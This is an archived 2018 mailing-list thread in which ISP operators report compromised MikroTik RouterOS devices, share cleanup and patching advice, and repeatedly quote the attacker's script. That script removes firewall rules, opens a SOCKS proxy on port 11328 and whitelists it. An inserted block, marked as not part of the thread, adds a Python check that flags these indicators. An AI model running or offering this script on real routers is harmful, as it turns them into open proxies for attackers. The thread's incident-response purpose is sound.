Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-10 Thread Bob Pensworth via Mikrotik-users
Yep. Busy. Busy. We’re doing the same thing. Zipping things up tight. 

 

73

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

 

From: Shawn C. Peppers  
Sent: Sunday, August 5, 2018 9:06 PM
To: Bob Pensworth 
Cc: Mikrotik Users 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

Been cleaning this up for random clients daily now, hence the reason I am 
very strongly voicing zero open ports (except l2tp and ipsec) to the outside 
network...  

 

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 


On Aug 5, 2018, at 7:57 PM, Bob Pensworth <beeper.bo...@gmail.com> wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; 
memb...@wisp.org <mailto:memb...@wisp.org> 
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-09 Thread ralphlists--- via Mikrotik-users
I only found it on boards that had Hotspot enabled. Did others find it on
ones without Hotspot?

 

From: mikrotik-users-boun...@wispa.org  On
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 9:06 PM
To: 'Shawn C. Peppers' ; 'Mikrotik Users'
; Bob Pensworth 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

We found the same about 10 days ago.. Upgraded to most current OS and
firmware versions, changed winbox port to a 5 digit port and changed user
name from admin and 10 digit alpha numeric symbol password.

Only found it on wan interface that has a public ip. On almost all boards
including ccr devices.

Thought it was just us as we were at 6.41.3 or older.

  _  

From: mikrotik-users-boun...@wispa.org on behalf of Bob Pensworth via
Mikrotik-users <mikrotik-users@wispa.org>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 

 

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255
connection-idle-timeout=60;/ip socks access remove [/ip socks access
find];/ip firewall filter add chain=input protocol=tcp port=11328
action=accept comment="port 11328";/ip firewall filter move [/ip firewall
filter find comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers
via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ;
memb...@wisp.org <mailto:memb...@wisp.org> 
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 



Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Dennis Burgess via Mikrotik-users
Yep, that  is another source, plus they have newsletters that they email out as 
well. ☺


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with www.towercoverage.com

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Grand Avenue Broadband via Mikrotik-users
Sent: Tuesday, August 7, 2018 10:39 AM
To: Mikrotik Users 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

MikroTik recently set up a blog specifically for breaking security issues, with 
an RSS feed.  I highly recommend subscribing.

https://blog.mikrotik.com/

On Aug 7, 2018, at 6:45 AM, Brian Vargyas via Mikrotik-users 
<mikrotik-users@wispa.org> wrote:

Mikrotik themselves also has published several security bulletins on their 
newsletter list.  If you're not on it, go to mikrotik.com <http://mikrotik.com/> 
and scroll to the bottom and sign up for the newsletter.

Brian



From: 20153514200n behalf of
Sent: Tuesday, August 7, 2018 8:34 AM
To: Dennis Burgess; Mikrotik Users
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

How does one subscribe to your news letter?
Alex Phillips
CEO and General Manager
RBNS.net<http://RBNS.net>
HighSpeedLink.net
540-908-3993



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
<mikrotik-users@wispa.org> wrote:
You should subscribe to our newsletters as we mentioned this several weeks 
ago….  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with 
www.towercoverage.com<http://www.towercoverage.com/>

From: mikrotik-users-boun...@wispa.org On Behalf Of Bruce Bridegwater via 
Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' <videodirectwispal...@gmail.com>; 
'Mikrotik Users' <mikrotik-users@wispa.org>; 
Bob Pensworth <beeper.bo...@gmail.com>
Cc: JP Douros <jdou...@rpmcable.com>
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provisioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.

From: mikrotik-users-boun...@wispa.org on behalf of Bob Pensworth via 
Mikrotik-users <mikrotik-users@wispa.org>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://directlinkadmin.com/>

--
  Grand Avenue Broadband -- Wireless Internet Service
 Circle City to Wickenburg and surrounding areas
  http://grandavebb.com



Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Grand Avenue Broadband via Mikrotik-users
MikroTik recently set up a blog specifically for breaking security issues, with 
an RSS feed.  I highly recommend subscribing.

https://blog.mikrotik.com/

> On Aug 7, 2018, at 6:45 AM, Brian Vargyas via Mikrotik-users 
>  wrote:
> 
> Mikrotik themselves also has published several security bulletins on their 
> newsletter list.  If you're not on it, go to mikrotik.com 
> <http://mikrotik.com/> and scroll to the bottom and sign up for the 
> newsletter.
> 
> Brian
> 
>  
> From: 20153514200n behalf of 
> Sent: Tuesday, August 7, 2018 8:34 AM
> To: Dennis Burgess; Mikrotik Users
> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>  
> How does one subscribe to your news letter?
> Alex Phillips
> CEO and General Manager
> RBNS.net
> HighSpeedLink.net
> 540-908-3993
> 
> 
> 
> On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
> <mikrotik-users@wispa.org> wrote:
> You should subscribe to our newsletters as we mentioned this several weeks 
> ago….  This is the exploit that was fixed back 4 months ago!  Lol  
> 
>  
> 
>  
> 
> Dennis Burgess, Mikrotik Certified Trainer
> 
> Author of "Learn RouterOS- Second Edition”
> 
> Link Technologies, Inc -- Mikrotik & WISP Support Services
> 
> Office: 314-735-0270  Website: http://www.linktechs.net 
> <http://www.linktechs.net/>
> Create Wireless Coverage’s with www.towercoverage.com 
> <http://www.towercoverage.com/>
>  
> 
> From: mikrotik-users-boun...@wispa.org On Behalf Of Bruce Bridegwater via 
> Mikrotik-users
> Sent: Sunday, August 5, 2018 8:16 PM
> To: 'Shawn C. Peppers' <videodirectwispal...@gmail.com>; 'Mikrotik Users' 
> <mikrotik-users@wispa.org>; Bob Pensworth <beeper.bo...@gmail.com>
> Cc: JP Douros <jdou...@rpmcable.com>
> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
> 
> Fyi, credit to J.P. Douros from RPM Provisioning Management for bringing it to 
> our attention and providing the solution.
> 
> RPM manages our Cisco UBR10k CMTS.
> 
> Great support company.
> 
> From: mikrotik-users-boun...@wispa.org on behalf of Bob Pensworth via 
> Mikrotik-users <mikrotik-users@wispa.org>
> Sent: Sunday, August 5, 2018 7:57:53 PM
> To: 'Shawn C. Peppers'; 'Mikrotik Users'
> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
> 
>  
> 
> We are finding an IP/Socks connection:
> 
> We are finding an event entry in System/Scheduler
> 
> And the (below) script in System/Script:
> 
>  
> 
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port 
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
> connection-idle-timeout=60;/ip socks access remove [/ip socks access 
> find];/ip firewall filter add chain=input protocol=tcp port=11328 
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall 
> filter find comment="port 11328"] 1;
> 
>  
> 
> -- 
> 
> Bob Pensworth, WA7BOB | General Manager
> 
> CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-, x1
> 
>  
> 
> From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via 
> Mikrotik-users
> Sent: Friday, March 16, 2018 11:54 AM
> To: mikrotik-users@wispa.org; memb...@wisp.org
> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
> 
>  
> 
> I have not tested this yet but
> 
>  
> 
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
> :: // Shawn Peppers
> 
> :: // DirectlinkAdmin.com 
> <http://directlinkadmin.com/>

-- 
  Grand Avenue Broadband -- Wireless Internet Service
 Circle City to Wickenburg and surrounding areas
  http://grandavebb.com



Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Brian Vargyas via Mikrotik-users
Mikrotik themselves also has published several security bulletins on their 
newsletter list.  If you're not on it, go to mikrotik.com and scroll to the 
bottom and sign up for the newsletter.

Brian



From: 20153514200n behalf of
Sent: Tuesday, August 7, 2018 8:34 AM
To: Dennis Burgess; Mikrotik Users
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

How does one subscribe to your news letter?
Alex Phillips
CEO and General Manager
RBNS.net
HighSpeedLink.net
540-908-3993



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users 
<mikrotik-users@wispa.org> wrote:
You should subscribe to our newsletters as we mentioned this several weeks 
ago….  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition”
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage’s with 
www.towercoverage.com<http://www.towercoverage.com>

From: mikrotik-users-boun...@wispa.org On Behalf Of Bruce Bridegwater via 
Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' <videodirectwispal...@gmail.com>; 
'Mikrotik Users' <mikrotik-users@wispa.org>; 
Bob Pensworth <beeper.bo...@gmail.com>
Cc: JP Douros <jdou...@rpmcable.com>
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provisioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.

From: mikrotik-users-boun...@wispa.org on behalf of Bob Pensworth via 
Mikrotik-users <mikrotik-users@wispa.org>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread alex phillips via Mikrotik-users
How does one subscribe to your news letter?
*Alex Phillips*
CEO and General Manager
RBNS.net
HighSpeedLink.net
*540-908-3993*



On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> You should subscribe to our newsletters as we mentioned this several weeks
> ago….  This is the exploit that was fixed back 4 months ago!  Lol
>
>
>
>
>
> *Dennis Burgess, Mikrotik Certified Trainer *
>
> Author of "Learn RouterOS- Second Edition”
>
> *Link Technologies, Inc* -- Mikrotik & WISP Support Services
>
> *Office*: 314-735-0270  Website: http://www.linktechs.net
>
> Create Wireless Coverage’s with www.towercoverage.com
>
>
>
> *From:* mikrotik-users-boun...@wispa.org 
> *On Behalf Of *Bruce Bridegwater via Mikrotik-users
> *Sent:* Sunday, August 5, 2018 8:16 PM
> *To:* 'Shawn C. Peppers' ; 'Mikrotik
> Users' ; Bob Pensworth 
> *Cc:* JP Douros 
> *Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> Fyi, credit to J.P. Douros from RPM Provisioning Management for bringing it
> to our attention and providing the solution.
>
> RPM manages our Cisco UBR10k CMTS.
>
> Great support company.
> --
>
> *From:* mikrotik-users-boun...@wispa.org 
> on behalf of Bob Pensworth via Mikrotik-users 
> *Sent:* Sunday, August 5, 2018 7:57:53 PM
> *To:* 'Shawn C. Peppers'; 'Mikrotik Users'
> *Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> We are finding an IP/Socks connection:
>
> We are finding an event entry in System/Scheduler
>
> And the (below) script in System/Script:
>
>
>
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255
> connection-idle-timeout=60;/ip socks access remove [/ip socks access
> find];/ip firewall filter add chain=input protocol=tcp port=11328
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall
> filter find comment="port 11328"] 1;
>
>
>
> --
>
> Bob Pensworth, WA7BOB | General Manager
>
> CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-, x1
>
>
>
> *From:* mikrotik-users-boun...@wispa.org 
> *On Behalf Of *Shawn C. Peppers via Mikrotik-users
> *Sent:* Friday, March 16, 2018 11:54 AM
> *To:* mikrotik-users@wispa.org; memb...@wisp.org
> *Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>
>
>
> I have not tested this yet but
>
>
>
>
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
>
> :: // Shawn Peppers
>
> :: // DirectlinkAdmin.com


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-07 Thread Dennis Burgess via Mikrotik-users
You should subscribe to our newsletters as we mentioned this several weeks 
ago….  This is the exploit that was fixed back 4 months ago!  Lol


Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS- Second Edition"
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: 
http://www.linktechs.net<http://www.linktechs.net/>
Create Wireless Coverage's with www.towercoverage.com

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 8:16 PM
To: 'Shawn C. Peppers' ; 'Mikrotik Users' 
; Bob Pensworth 
Cc: JP Douros 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

Fyi, credit to J.P. Douros from RPM Provisioning Management for bringing it to 
our attention and providing the solution.
RPM manages our Cisco UBR10k CMTS.
Great support company.

From: mikrotik-users-boun...@wispa.org on behalf of Bob Pensworth via 
Mikrotik-users <mikrotik-users@wispa.org>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users

Right.

I wanted to make sure people know that there are lots of things that may 
or may not be impacted if a device is infected.  You either have to 
totally delete the configuration and restore from backup or you need to 
go through every menu item and make sure they have not been changed.



On 8/6/2018 6:55, Tim wrote:


This has been detected in devices with earlier versions of ROS.

*From:*mikrotik-users-boun...@wispa.org 
 *On Behalf Of *Scott Reed via 
Mikrotik-users

*Sent:* Monday, August 6, 2018 5:58 AM
*To:* mikrotik-users@wispa.org
*Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all 
I remember off the top of my head.


On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment
~ "port [0-9]*"];/ip socks set enabled=yes port=11328
max-connections=255 connection-idle-timeout=60;/ip socks access
remove [/ip socks access find];/ip firewall filter add chain=input
protocol=tcp port=11328 action=accept comment="port 11328";/ip
firewall filter move [/ip firewall filter find comment="port
11328"] 1;

-- 


Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-, x1

*From:* mikrotik-users-boun...@wispa.org *On Behalf Of *Shawn C.
Peppers via Mikrotik-users
*Sent:* Friday, March 16, 2018 11:54 AM
*To:* mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>;
memb...@wisp.org <mailto:memb...@wisp.org>
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but


https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>







--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained





--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained
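
Added example, not part of the thread or of any poster's message: a Python check over a RouterOS `/export` that flags the changes reported above (SOCKS enabled, an input accept rule commented "port N", scheduler and script entries, DDNS, web proxy, DNS servers, identity). The export text is constructed, and the expected DNS servers and identity are assumed inputs the operator supplies.

```python
import re

# Constructed sample of RouterOS "/export" output, not taken from a real device.
SAMPLE_EXPORT = r'''# constructed sample export
/ip cloud
set ddns-enabled=yes
/ip dns
set servers=203.0.113.53
/ip firewall filter
add action=accept chain=input comment="port 11328" port=11328 protocol=tcp
add action=accept chain=input comment="allow established" \
    connection-state=established,related
add action=drop chain=input in-interface=ether1
/ip proxy
set enabled=yes
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=11328
/system identity
set name=edge-01
/system scheduler
add interval=30s name=sched1 on-event=script1
/system script
add name=script1 source="/ip socks set enabled=yes port=11328"
'''

PARAM_RE = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S*)')
PORT_COMMENT_RE = re.compile(r'port [0-9]+')   # comment style used by the script in the thread
SCRIPT_RE = re.compile(r'/ip socks|/ip firewall filter (add|remove|move)')


def parse_export(text):
    """Return [(menu, verb, params)] for export-style text (menu path on its own line)."""
    text = re.sub(r'\\\r?\n[ \t]*', '', text)   # join lines wrapped with a trailing backslash
    menu, commands = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('/'):
            menu = line
            continue
        verb, _, rest = line.partition(' ')
        params = {}
        for key, value in PARAM_RE.findall(rest):
            params[key] = value[1:-1] if value.startswith('"') else value
        commands.append((menu, verb, params))
    return commands


def audit(text, expected_dns=(), expected_identity=None):
    """Return [(finding_id, detail)] for settings the thread reports as altered."""
    findings = []
    for menu, verb, p in parse_export(text):
        if menu == '/ip socks' and p.get('enabled') == 'yes':
            findings.append(('socks-enabled', 'port ' + p.get('port', 'default')))
        elif menu == '/ip firewall filter' and verb == 'add':
            if (p.get('chain') == 'input' and p.get('action') == 'accept'
                    and PORT_COMMENT_RE.fullmatch(p.get('comment', ''))):
                findings.append(('fw-port-comment', p['comment']))
        elif menu == '/system scheduler' and verb == 'add':
            # Every scheduler entry is listed for review, not only known-bad ones.
            detail = p.get('name', '?') + ' -> ' + p.get('on-event', '?')
            findings.append(('scheduler-entry', detail))
        elif menu == '/system script' and verb == 'add':
            if SCRIPT_RE.search(p.get('source', '')):
                findings.append(('script-changes-access', p.get('name', '?')))
        elif menu == '/ip cloud' and p.get('ddns-enabled') == 'yes':
            findings.append(('ddns-enabled', 'ddns-enabled=yes'))
        elif menu == '/ip proxy' and p.get('enabled') == 'yes':
            findings.append(('web-proxy-enabled', 'enabled=yes'))
        elif menu == '/ip dns' and verb == 'set':
            servers = [s for s in p.get('servers', '').split(',') if s]
            unexpected = [s for s in servers if s not in expected_dns]
            if unexpected:
                findings.append(('dns-unexpected', ','.join(unexpected)))
        elif menu == '/system identity' and verb == 'set':
            if expected_identity is not None and p.get('name') != expected_identity:
                findings.append(('identity-changed', p.get('name', '')))
    return findings


if __name__ == '__main__':
    for finding_id, detail in audit(SAMPLE_EXPORT, expected_dns={'192.0.2.1'},
                                    expected_identity='edge-01'):
        print(f'{finding_id:24} {detail}')
```

An empty result only means none of these specific indicators appear in the export; it does not show the device is clean.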





Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Tim via Mikrotik-users
This has been detected in devices with earlier versions of ROS.



From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Scott Reed via Mikrotik-users
Sent: Monday, August 6, 2018 5:58 AM
To: mikrotik-users@wispa.org
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27



It will also change device identity, change admin password, add Admin, add 5 
firewall filter rules to redirect forward traffic, change DNS server, enable 
DDNS, add IP Web Proxy rules and more, but that is all I remember off the top 
of my head.



On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:



/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;



--

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-, x1



From: mikrotik-users-boun...@wispa.org On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; 
memb...@wisp.org <mailto:memb...@wisp.org>
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27



I have not tested this yet but



https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>











--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained




 


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users
It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all I 
remember off the top of my head.



On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:


We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ 
"port [0-9]*"];/ip socks set enabled=yes port=11328 
max-connections=255 connection-idle-timeout=60;/ip socks access remove 
[/ip socks access find];/ip firewall filter add chain=input 
protocol=tcp port=11328 action=accept comment="port 11328";/ip 
firewall filter move [/ip firewall filter find comment="port 11328"] 1;


--

Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC  | (360) 928-, x1

*From:* mikrotik-users-boun...@wispa.org 
 *On Behalf Of *Shawn C. Peppers via 
Mikrotik-users

*Sent:* Friday, March 16, 2018 11:54 AM
*To:* mikrotik-users@wispa.org; memb...@wisp.org
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 





--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained





Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-05 Thread Shawn C. Peppers via Mikrotik-users
Been cleaning this up for random clients daily now, hence the reason I am 
very strongly voicing zero open ports (except l2tp and ipsec) to the outside 
network...  

:: // Shawn Peppers
:: // DirectlinkAdmin.com

> On Aug 5, 2018, at 7:57 PM, Bob Pensworth  wrote:
> 
> We are finding an IP/Socks connection:
> We are finding an event entry in System/Scheduler
> And the (below) script in System/Script:
>  
> /ip firewall filter remove [/ip firewall filter find where comment ~ "port 
> [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
> connection-idle-timeout=60;/ip socks access remove [/ip socks access 
> find];/ip firewall filter add chain=input protocol=tcp port=11328 
> action=accept comment="port 11328";/ip firewall filter move [/ip firewall 
> filter find comment="port 11328"] 1;
>  
> --
> Bob Pensworth, WA7BOB | General Manager
> CresComm WiFi, LLC | (360) 928-, x1
>  
> From: mikrotik-users-boun...@wispa.org  On 
> Behalf Of Shawn C. Peppers via Mikrotik-users
> Sent: Friday, March 16, 2018 11:54 AM
> To: mikrotik-users@wispa.org; memb...@wisp.org
> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
>  
